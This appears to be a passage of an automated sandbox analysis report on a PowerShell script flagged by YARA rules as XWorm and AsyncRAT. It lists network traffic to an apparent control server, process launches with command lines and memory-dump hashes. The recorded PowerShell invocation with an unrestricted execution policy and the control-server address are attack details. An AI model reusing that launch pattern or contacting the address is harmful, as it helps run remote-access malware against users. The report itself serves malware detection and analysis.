                                      Jan 2, 2025 09:04:02.863426924 CET497144412192.168.2.7176.113.115.170
                                      Jan 2, 2025 09:04:02.868321896 CET441249714176.113.115.170192.168.2.7
                                      Jan 2, 2025 09:04:03.077627897 CET441249714176.113.115.170192.168.2.7
                                      Jan 2, 2025 09:04:03.132272005 CET497144412192.168.2.7176.113.115.170
                                      Jan 2, 2025 09:04:10.358833075 CET497144412192.168.2.7176.113.115.170

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:03:00:07
                                      Start date:02/01/2025
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115_1.170.ps1"
                                      Imagebase:0x7ff741d30000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1341599146.0000024A90F6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1341599146.0000024A90F6F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:03:00:07
                                      Start date:02/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:03:00:10
                                      Start date:02/01/2025
                                      Path:C:\Windows\System32\ipconfig.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\system32\ipconfig.exe" /flushdns
                                      Imagebase:0x2a0000
                                      File size:35'840 bytes
                                      MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:10
                                      Start time:03:00:13
                                      Start date:02/01/2025
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                      Imagebase:0xf00000
                                      File size:45'984 bytes
                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000002.3659100760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.3659100760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000002.3662994755.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:18
                                      Start time:04:28:18
                                      Start date:02/01/2025
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 1420
                                      Imagebase:0x250000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Executed Functions

                                        Function 00007FFAACA348F2 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1371724934.00007FFAACA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffaaca30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Yr
                                        • API String ID: 0-48185740
                                        • Opcode ID: 565990619047247ff8da3859423ca72c1e1d6e2578ffd43992ac0b1fb588730e
                                        • Instruction ID: c24bf7a335adfc8c9bf66428129bc8ebf4c87e9cd5e784a4ad4ab242ddeed186
                                        • Opcode Fuzzy Hash: 565990619047247ff8da3859423ca72c1e1d6e2578ffd43992ac0b1fb588730e
                                        • Instruction Fuzzy Hash: 8B110876D3E607C7F2216774B8A44B53B56AF82324B15C232D04DCF3C2ED18E80982C1
                                        Function 00007FFAACB0149A Relevance: .1, Instructions: 112COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1372189738.00007FFAACB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffaacb00000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 054776fc598e49c0767ec88671c07429876a3e6ee24a6cb38f5ac4346b601df9
                                        • Instruction ID: f8f1678d56e641128f08feec40e1c7bd61d2226843b54eacfa6c945d64bcd405
                                        • Opcode Fuzzy Hash: 054776fc598e49c0767ec88671c07429876a3e6ee24a6cb38f5ac4346b601df9
                                        • Instruction Fuzzy Hash: 2A21E532B0D9298FF6A8966CA4565F8B3D1EF95220B1881B7D04FC31A2DD1ADC0543C0
                                        Function 00007FFAACA337B5 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1371724934.00007FFAACA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffaaca30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                        • Instruction ID: e82dd6251c3919d9c598cbe899f151cefd45bd73b11233d7294b8cd6200604cf
                                        • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                        • Instruction Fuzzy Hash: 1B01677111CB0D8FDB48EF0CE451AB6B7E0FB95364F10056DE58AC3661D636E892CB45
                                        Function 00007FFAACB014C1 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1372189738.00007FFAACB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffaacb00000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b48b18cf42aa9b987428656c19aa1f9b202b448f0b25ee82131f32d93426b5fb
                                        • Instruction ID: 86108f0f94eebb91bf64849045aa0d0b746d304b7f8f15bbbce87b70d6cc7bef
                                        • Opcode Fuzzy Hash: b48b18cf42aa9b987428656c19aa1f9b202b448f0b25ee82131f32d93426b5fb
                                        • Instruction Fuzzy Hash: F2F02723F4E9295EF6E9929C741A5F856C1DFA5621B4882B7D54FC32A2DC05DC1903C0
                                        Function 00007FFAACA389CE Relevance: .0, Instructions: 40COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1371724934.00007FFAACA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffaaca30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b7faea9fefb52cfa75fd5994ddaa3f483de9e18e1e582f790d0192c7421e3833
                                        • Instruction ID: 90815fb80b3ed13a8b873601ab0947a1c17633a636141c6c6b7fb596b0185c8a
                                        • Opcode Fuzzy Hash: b7faea9fefb52cfa75fd5994ddaa3f483de9e18e1e582f790d0192c7421e3833
                                        • Instruction Fuzzy Hash: 0CF0E9397486064BEB0CDE3C94670397297E786300760923DE89BC73E2FC28E92782C1
                                        Function 00007FFAACA34D00 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1371724934.00007FFAACA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffaaca30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b727f4526ccf4b311533c3c31e49d3278740284307d0c96112862d975f002928
                                        • Instruction ID: 1377de2e639426a5eab6ad3991235336052ff0eed2a427ce667c9eac023baa91
                                        • Opcode Fuzzy Hash: b727f4526ccf4b311533c3c31e49d3278740284307d0c96112862d975f002928
                                        • Instruction Fuzzy Hash: BFF0E97644D3CA8FE3134B60A8611917FA0EF03250F0802EEE099CB2D3D918944E8791
                                        Function 00007FFAACA359AB Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1371724934.00007FFAACA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffaaca30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1a07c53a51dc0a5e7ec9e8ba0b925302448f5c9b2c5888fc863a9df7c9e7bd1a
                                        • Instruction ID: 62c5c78b43617f1808823a6e8b21993be25f5bb37c66fb06c3b420a5dd472d78
                                        • Opcode Fuzzy Hash: 1a07c53a51dc0a5e7ec9e8ba0b925302448f5c9b2c5888fc863a9df7c9e7bd1a
                                        • Instruction Fuzzy Hash: 11F0963057D7408FD7089B18909107EBBD2FFCA704F40657DF4CA43241CA24B8038A83
                                        Function 00007FFAACA34CD7 Relevance: .0, Instructions: 28COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1371724934.00007FFAACA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffaaca30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4f4ea97f344dc7b3226ab5761fa06929654e80a8e3d4b883a01cc943edb02b34
                                        • Instruction ID: b4de3b8c6dc07a51ce0877a10356677d2ee5ff3c67fedd900e2137e78f17047b
                                        • Opcode Fuzzy Hash: 4f4ea97f344dc7b3226ab5761fa06929654e80a8e3d4b883a01cc943edb02b34
                                        • Instruction Fuzzy Hash: 98F06D74E1510BCBEB44DFA8D4819FEBBF2BB85310F108529D019E3385DE38AA44CB94

                                        Non-executed Functions

                                        Function 00007FFAACA35FA0 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1371724934.00007FFAACA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffaaca30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: gfff
                                        • API String ID: 0-1553575800
                                        • Opcode ID: d041dce5436f87b3372a067789f849bc13a2bf3b8656b67615ab467e601dc3a6
                                        • Instruction ID: c7a7ca84a2d980525370b86cad152b019aec12366005605b21437defc0512709
                                        • Opcode Fuzzy Hash: d041dce5436f87b3372a067789f849bc13a2bf3b8656b67615ab467e601dc3a6
                                        • Instruction Fuzzy Hash: 82512932A1E7594FD31E863D9C564B17BA6EB8722071582BFD0C7CB2A3E914AC07C2D1
                                        Function 00007FFAACA3211D Relevance: .6, Instructions: 600COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1371724934.00007FFAACA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffaaca30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f0b715ebf7fcc28299edffad1d539ca3ea1d83755d2d370a3ad06c02b5ee9c3a
                                        • Instruction ID: e5df41d4116542973b954a933c71e897b16612ca2fd1a35dc3561181fac022d8
                                        • Opcode Fuzzy Hash: f0b715ebf7fcc28299edffad1d539ca3ea1d83755d2d370a3ad06c02b5ee9c3a
                                        • Instruction Fuzzy Hash: 390291AB91E7D28FF3034768AC760F53F61EF53265B0941F7C1D98A193E929580A83E1
                                        Function 00007FFAACA3554A Relevance: .1, Instructions: 138COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1371724934.00007FFAACA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffaaca30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 871d9e2e100b3981a39f4f4a66db9b39f62a94a8dde74fd551d90f8bda14f9a8
                                        • Instruction ID: fefcd34422bb76b6d6fa17b7a0e8d776ecdbe3e9abcad9ddc84bc3b169663bcb
                                        • Opcode Fuzzy Hash: 871d9e2e100b3981a39f4f4a66db9b39f62a94a8dde74fd551d90f8bda14f9a8
                                        • Instruction Fuzzy Hash: 6931376691E7C64FE31E9AB85C6A076BF95DF4311070982BEC0CACB5A3EC48580B83D1
                                        Function 00007FFAACA3A9D9 Relevance: .1, Instructions: 125COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1371724934.00007FFAACA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffaaca30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f0cd59ced59a16a821a16c5fbeefbb2a91a622081edb3dd3f2e2dac2b3ec422
                                        • Instruction ID: d4d892e4fba1ce99ffdcc8fe56847a4fe4d75adfdfe40c7aed77c8057973c389
                                        • Opcode Fuzzy Hash: 7f0cd59ced59a16a821a16c5fbeefbb2a91a622081edb3dd3f2e2dac2b3ec422
                                        • Instruction Fuzzy Hash: 48314562A4E3D80FD31D9E745C6B471BFA5CB5322430681FFC4C6CB5A3E90898078391
                                        Function 00007FFAACA3044D Relevance: 6.3, Strings: 5, Instructions: 89COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1371724934.00007FFAACA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffaaca30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 8,$P/$p0$-$/
                                        • API String ID: 0-3051605661
                                        • Opcode ID: 9911870f71288d0252ed51b95d68e8e40a7957f56cf61e1a2faadb3629435e94
                                        • Instruction ID: cdd92f99aea10829ee8f0762821192c2c91892a96b0178ac97d1ab7515419480
                                        • Opcode Fuzzy Hash: 9911870f71288d0252ed51b95d68e8e40a7957f56cf61e1a2faadb3629435e94
                                        • Instruction Fuzzy Hash: EE316F6791F7C14EF31687A828261386E66AF53210B0D80FBD0CC8B6D7A405DE4DC3D2

                                        Executed Functions

                                        Function 03047A14 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0304811A), ref: 03048207
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.3662106013.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_3040000_RegSvcs.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
                                        • Opcode ID: 67ba34f6fd3b1592c8979a5cce0b1be0c90c66a261fa18023c231dba361211af
                                        • Instruction ID: a4db42987e8185a1d31969a4b48633b2ca59153c1462ad9689a9a5caefade1c1
                                        • Opcode Fuzzy Hash: 67ba34f6fd3b1592c8979a5cce0b1be0c90c66a261fa18023c231dba361211af
                                        • Instruction Fuzzy Hash: D11112B2C01659DFDB10DF9AC544BDEFBF4FB48220F14856AE918A7240D379AA40CFA5
                                        Function 0304819A Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0304811A), ref: 03048207
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.3662106013.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_3040000_RegSvcs.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
                                        • Opcode ID: c7948ba94cef4ee2793c4bcc088ef1649baac1e304de1feb8adad45a71bab4a6
                                        • Instruction ID: 5e91df8b54feec55a2ba8326daaae8b282d9c34841a7e6ad34a152cd7a8ccb62
                                        • Opcode Fuzzy Hash: c7948ba94cef4ee2793c4bcc088ef1649baac1e304de1feb8adad45a71bab4a6
                                        • Instruction Fuzzy Hash: C21100B6C00669DFDB10CFAAD944BDEFBF4BF08210F14856AD918A7240D378A9448FA5
                                        Function 0198D400 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.3660847943.000000000198D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0198D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_198d000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c85e1e364d10f31358f9e9cae525ae2016672726eddbc3242123810d01a94c64
                                        • Instruction ID: d62e4fe824f0fc81789e1cd499596e07ea4f9881b84ea3234fc998e8bf5b5ad4
                                        • Opcode Fuzzy Hash: c85e1e364d10f31358f9e9cae525ae2016672726eddbc3242123810d01a94c64
                                        • Instruction Fuzzy Hash: 23210671504204DFDF15EFA8D9C0F56BBA5FB84714F20C569E9090B2D6C336E456CAA1
                                        Function 0198D3FB Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.3660847943.000000000198D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0198D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_198d000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                        • Instruction ID: 99e9156e29091c241978290c5e5110348dff11e717d3caaf3eab2d4b7e7e97d5
                                        • Opcode Fuzzy Hash: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                        • Instruction Fuzzy Hash: FE11DF72404240CFDB12DF68D5C4B56BFA1FB84324F24C5A9D8094B697C33AE456CBA1